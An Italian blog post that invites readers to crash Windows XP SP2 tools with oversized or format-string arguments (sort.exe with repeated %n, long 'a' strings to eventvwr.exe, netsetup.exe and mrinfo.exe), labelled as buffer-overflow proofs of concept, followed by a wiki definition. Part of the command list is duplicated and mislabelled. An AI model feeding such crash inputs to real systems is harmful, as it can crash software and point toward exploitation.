Windows XP e il traboccamento del cuscinetto – 52
Provate ad eseguire i seguenti comandi sotto Windows XP anche se Service Pack 2:
Format String in sort.exe
c:\> sort.exe %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
Buffer Overlow in eventvwr.exe (UNICODE)
c:\> eventvwr.exe aaaaaaaaaa(848 ‘a’ characters)
Overlow in netsetup.exe
c:\> netsetup.exe aaaaaaaaaa(285 ‘a’ characters)
Buffer Overlow in mrinfo.exe POC
c:\> sort.exe %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
Buffer Overlow in eventvwr.exe (UNICODE)
c:\> eventvwr.exe aaaaaaaaaa(848 ‘a’ characters)
Overlow in netsetup.exe
c:\> netsetup.exe aaaaaaaaaa(285 ‘a’ characters)
Buffer Overlow in mrinfo.exe POC
c:\> mrinfo.exe aaaaaaaaaa(71 ‘a’ characters)
Si verifichera quello che in gergo si chiama Buffer OverFlow
Ecco la definizione da wiki:
"Il buffer overflow è un problema che può affliggere un programma software. Consiste nel fornire al programma più dati di quanto esso si aspetti di ricevere, facendo in modo che una parte di questi dati vadano scritti in zone di memoria dove sono, o dovrebbero essere, altri dati o lo stack del programma stesso. "
Related Post
Tagged as dblog, System + Categorized as Informatica, Blog
